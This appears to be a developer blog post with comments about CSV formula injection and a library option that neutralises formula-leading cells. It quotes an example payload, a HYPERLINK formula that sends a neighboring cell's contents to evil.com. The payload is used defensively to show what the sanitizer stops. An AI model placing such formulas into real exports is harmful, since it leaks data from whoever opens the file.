Myroslav Martsin

Posted on Jun 18

The CSV export vulnerability you probably have (and a one-line fix)

#security #webdev #javascript #typescript

You let users export data to CSV. They open it in a spreadsheet. A cell runs a formula. That is CSV injection, and most export endpoints have it.

Any cell starting with =, +, -, @, a tab, or a carriage return is treated as a formula. An attacker-controlled name like =HYPERLINK("http://evil.com?x="&A1) then runs on open and leaks a neighboring cell. The CSV is perfectly valid, so escaping commas does nothing here.

The fix is to prefix formula-leading cells. csv-pipe has it built in:

import { stringify } from 'csv-pipe';

const rows = [{ name: '=HYPERLINK("http://evil.com?x="&A1)', note: 'attacker' }];

stringify(rows, { sanitizeFormulas: true });
// name,note
// "'=HYPERLINK(""http://evil.com?x=""&A1)",attacker

The leading ' makes the spreadsheet show the cell as text instead of running it (the doubled quotes are normal CSV escaping). It only touches string and array cells; numbers and dates are left alone.
Turn it on for any export of untrusted data.

csv-pipe is a small, zero-dependency CSV library that encodes and parses, both directions typed and streaming, with this guard built in.

Top comments (9)

Joel Horvath • Jun 18

Yeah, this is one of those “still bites people in 2026” issues.
The key point is simple but easy to miss: CSV isn’t a data format in Excel’s world—it’s a command vector.
The sanitizeFormulas: true approach is basically the right default.
One question though: do you think teams should always sanitize, or only for exports that are explicitly meant for Excel/Sheets use?

Myroslav Martsin • Jun 18

Great framing, "command vector" nails it.

I would not gate it on "is this for Excel." You rarely control the consumer. A "data pipeline" CSV still gets double-clicked by some analyst. So the real axis is "could untrusted data reach a spreadsheet," and usually you cannot rule that out.

The asymmetry settles it: cost of sanitizing is a stray leading quote, cost of not is code execution or data exfiltration. So default on for any untrusted, human-reachable export.

Only skip it for strict machine-to-machine exports where values must round-trip exactly. When in doubt, sanitize.

Joel Horvath • Jun 18

Got it, Myroslav.
Your post is great, and I can see you’re very experienced. Thanks again for sharing it.
I’ve been thinking about an idea for a while, and I’m looking for someone with your level of expertise to help bring it to life.
If you’re interested, let me know and we can discuss it further.

Joel Horvath • Jun 18

Myroslav.
Chatting here is not convenient. Please share you mail for communication.

Ofri Peretz • Jun 20

what makes this one nasty is that it's a perfectly valid csv, so the exploit sails through every 'is it well-formed' check and escaping commas does nothing — exactly as you said. sanitizing at the serializer is the right layer. the bit i'd add from the security side: that guard rots the moment someone hand-rolls a new export path and forgets it, so i also pin it with a lint rule that flags raw csv writes of untrusted input. since csv-pipe parses both directions, does the leading quote survive a round-trip or does parse() strip it back to the original value?

Myroslav Martsin • Jun 20 • Edited

Good call on the lint rule, that's the real failure mode. The flag only helps on paths someone remembers, so I'd route untrusted exports through one helper that turns it on and have the linter ban raw CSV writes. Fix it in one place instead of every call site.

On the round-trip: the quote sticks. parse() doesn't strip it, so =1+1 goes out as '=1+1 and reads back as '=1+1, not =1+1. It's encode-side only by design. To the parser ' is just a normal character (the CSV quote is "), so it can't tell whether you added it or the value really started with '. Auto-stripping would wreck real data.

So only sanitize what's headed for a spreadsheet, not what you need back exactly. And if you ever strip it on re-import, only do it when you know the whole column was sanitized.

leob • Jun 19

Good to be aware of this!

Mudassir Khan • Jun 21

the 'can't control the consumer' argument is the strongest reason to default on — you don't know if a 'data pipeline csv' gets double clicked by an analyst six months later.

the lint rule point is good, but in TypeScript you can push the enforcement into the type system: a branded type like SanitizedRow vs UnsanitizedRow means the serializer's return type is incompatible with an export endpoint that expects sanitized data. the compiler catches the forgotten path before the linter does, and refactors can't quietly break it.

does the library expose the sanitized output as a distinct type, or is the guarantee purely runtime?

Myroslav Martsin • Jun 22

Agreed on default on. The analyst who double clicks it six months later is exactly why "is this for Excel" is the wrong question.

On pushing it into the type system: that's the right call, and the compiler beating the linter is the real win since a refactor can't quietly undo it. Honest answer though: today it's purely runtime. stringify returns a plain string whether or not sanitizeFormulas is set, there's no branded type.

One nuance: sanitization here is a property of the output, not the input rows. The same rows produce sanitized or raw CSV depending on the flag, so a SanitizedRow brand doesn't quite fit. The natural place is the result: stringify with the guard returning a branded SanitizedCsv (string & { __sanitized: true }) that your response helper requires. Same end-to-end, refactor-proof guarantee, just anchored on the output. It's a clean addition, happy to take an issue if you want it.